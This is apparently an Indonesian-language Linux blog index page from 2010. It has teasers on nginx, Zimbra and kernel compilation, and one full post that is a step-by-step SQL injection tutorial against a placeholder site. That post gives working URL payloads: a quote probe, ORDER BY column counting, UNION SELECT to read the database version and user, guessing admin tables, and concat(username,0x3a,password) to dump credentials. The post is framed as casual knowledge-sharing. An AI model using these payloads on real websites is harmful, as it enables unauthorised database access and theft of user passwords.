Many of us are familiar with the use of Apache for hosting websites. It might not be the fastest webserver but it is extraordinarily popular, extremely flexible, and a great choice for most people. However there are times when it can struggle, and placing a proxy in front of it can be useful.

nginx is a very small, fast, and efficient HTTP server with a lot of built in smarts to allow it to work as a reverse proxy, and not just for HTTP, it also supports SMTP.

Baca Lanjutannya…

Kemarin sore saya menyempatkan diri membuat sebuah Xen Hypervisor Guest pada server dan mengisi SLES JEOS 64 bit dalam modus paravirtualization untuk digunakan sebagai media testing Zimbra Collaboration Suite 6.0.5. Selesai install,

Baca Lanjutannya…

Tutorial berikut ini akan menjelaskan langkah demi langkah untuk melakukan instalasi Zimbra mail server versi 5.0.21 pada openSUSE 11.2 32 bit. Zimbra 5.0.21 adalah Zimbra versi paling update dari versi 5.x.x dan merupakan salah satu versi stabil selain versi 6.x.x.

Pada kesempatan lain saya akan menjelaskan panduan instalasi dan konfigurasi Zimbra Mail Server versi 6.x.x pada openSUSE 64 bit.

Baca Lanjutannya…

Catatan : Pada saat tutorial ini dipublish, Zimbra sudah merilis Zimbra Mail Server versi 5.0.22. Secara prinsip, panduan ini tetap bisa digunakan pada Zimbra 5.0.22. Silakan sampaikan melalui komentar jika ada masalah saat implementasi Zimbra 5.0.22 pada openSUSE 11.2.

Konfigurasi ini bisa diterapkan pada openSUSE 11.0, openSUSE 11.1 dan SUSE Linux Enterprise 11 dengan sedikit penyesuaian tampilan.

Baca Lanjutannya…

Oleh: em44y | 12 Maret, 2010

Compile Kernel (Help Ubuntu)

Disclaimer

Building and using a custom kernel will make it very difficult to get support for your system. While it is a learning experience to compile your own kernel, you will not be allowed to file bugs on the custom-built kernel (if you do, they will be Rejected without further explanation).

Baca Lanjutannya…

Oleh: em44y | 12 Maret, 2010

How To Compile A Kernel – The Ubuntu Way

Version 1.0
Author: Falko Timme <ft [at] falkotimme [dot] com>
Last edited 11/05/2006

Each distribution has some specific tools to build a custom kernel from the sources. This article is about compiling a kernel on Ubuntu systems. It describes how to build a custom kernel using the latest unmodified kernel sources from www.kernel.org (vanilla kernel) so that you are independent from the kernels supplied by your distribution. It also shows how to patch the kernel sources if you need features that are not in there.

I have tested this on Ubuntu 6.10 Server (“Edgy Eft”) and Ubuntu 6.06 Desktop (“Dapper Drake”).

I want to say first that this is not the only way of setting up such a system. There are many ways of achieving this goal but this is the way I take. I do not issue any guarantee that this will work for you!

 

Baca Lanjutannya…

Oleh: em44y | 12 Maret, 2010

Debian-Kernel-Compile-Howto (Kernel 2.6)

Version 1.1
Author: Falko Timme <ft [at] falkotimme [dot] com>
Last edited 07/15/2005

In some cases you might want to compile your own kernel that suits your needs better than the standard kernel that comes with your distribution. I will describe how to do this on a Debian Woody machine (a description for Debian Sarge can be found here!). Please note that this tutorial is for kernel 2.6 only! A tutorial for kernel 2.4 can be found here.

Be aware that there is some risk in doing so! For example, it could happen that your machine does not boot properly after you have installed the new kernel so you might be forced to boot from a rescue CD to repair your system. You have been warned! This document comes without warranty of any kind!

 

Baca Lanjutannya…

Oleh: em44y | 12 Maret, 2010

Kompilasi Kernel Cara Lain

1. Update cache repository
Code:

# apt-get update

2. Install paket-paket yang diperlukan untuk kompilasi kernel.
Code:

Baca Lanjutannya…

Oleh: em44y | 12 Maret, 2010

SQL Injection Versi MySQL 4

teknik sql injection di mysql versi 4 dan 5 sangat berbeda, di versi 5 kita menggunakan information schema untuk melihat isi table dalam database, di versi 4 kita cuma bisa menebak-nebak table yang kira-kira ada didalam database. contoh gini

1. cek vulner dengan menambahkan (‘) diakhir url

http://www.mampus.com/news.php?id=5&prime;

jika muncul error,ada kemungkinan web ini vulner buat di injek :D

2. temukan jumlah kolom (angka ajaib)

http://www.mampus.com/news.php?id=5 order by 1/* <– no error

http://www.mampus.com/news.php?id=5 order by 2/* <– no error

http://www.mampus.com/news.php?id=5 order by 3/* <– no error

http://www.mampus.com/news.php?id=5 order by 4/* <– error

berarti jumlah kolomnya ada 3

3. cek fungsi union
http://www.mampus.com/news.php?id=5 union all select 1,2,3/*

jika muncul angka di web seperti 1,2,3 berarti fungsi union udah jalan :)

4. cek versi, database, user

misal setelah memakai fungsi union keluar angka 1 dan 3, berarti itu angka yang bisa kita explore dan bisa diganti dengan
version() -> untuk melihat versi mysql
database() -> untuk melihat nama database
user() -> untuk melihat nama user

ex:
misal angka yang keluar di web setelah memakai fungsi union keluar 1 dan 3, kita pilih angka 1 buat diexplore.

it should look like this http://www.mampus.com/news.php?id=5 union all select version(),2,3/*

dan akan mendapatkan hasil seperti ini 4.1.33-log atau 5.0.45, itu adalah versi dari mysqlnya..
disini akan dibahas mengenai versi 4, untuk yang versi 5 baca aja postingan sebelum ini disini.

5. mencari table dan kolom

kita hanya bisa menebak kira-kira table apa yang ada didatabase, yang umum digunakan

table names: user/s, admin/s, member/s …

column names: username, user, usr, user_name, password, pass, passwd, pwd dll…

6. coba keberuntungan :D

cek table admin ada or not di database dengan perintah seperti ini dengan mengexplore angka 1 tadi

http://www.mampus.com/news.php?id=5 union all select 1,2,3 from admin/*

jika muncul angka ajaib seperti perintah union tadi, berarti table admin exists!!
jika tidak muncul cari table yang lain misal user/s, member/s,author/s dll pokoknya ampe ketemu dech! :D

lanjut! tadikan table admin udah ada nich, selanjutnya tinggal cari kolomnya

http://www.mampus.com/news.php?id=5 union all select username,2,3 from admin/*

jika muncul angka ajaib seperti perintah union tadi, berarti kolom username di table admin ada!
misal ga muncul cari kemungkinan yang lain misal user,usr dll

kolom username dah ketemu, selanjutnya cek kolom password

http://www.mampus.com/news.php?id=5 union all select password,2,3 from admin/*

jika muncul angka ajaib seperti perintah union tadi, berarti kolom password di table admin ada!
misal ga muncul cari kemungkinan yang lain misal pass dll

kolom username dan password telah ditemukan di table admin, tinggal finishing dech, misal passwordnya ga diencrypt syukur, misal diencrypt tinggal decrypt aja..

http://www.mampus.com/news.php?id=5 union all select concat(username,0×3a,password),2,3 from admin/*

ket: 0×3a adalah bentuk hexa dari :

huh.. udah mau jam 7 pagi mo kuliah dulu yach, ntar telat ga boleh masuk ma dosennya.. hiks hiks… T.T
sekian dulu aja, maaf misal klo salah coz saya masih pemula banget (masih pemula ngasih tutor??##), levelnya dibawah pemula dech!
disini cuma share pengalaman aja :D coz kita tidak berhak menyembunyikan suatu ilmu, karena kita dapat ilmu itu juga bukan karena kita sendiri.. udah ah! cabut dulu…

Ref http://annotes.wordpress.com/2010/03/11/sql-injection-versi-mysql-4/

Oleh: em44y | 12 Maret, 2010

SQL Injection Versi 5 MySQL

hanya sekedar Info, gunakan secara bijak

Baca Lanjutannya…

Older Posts »

Kategori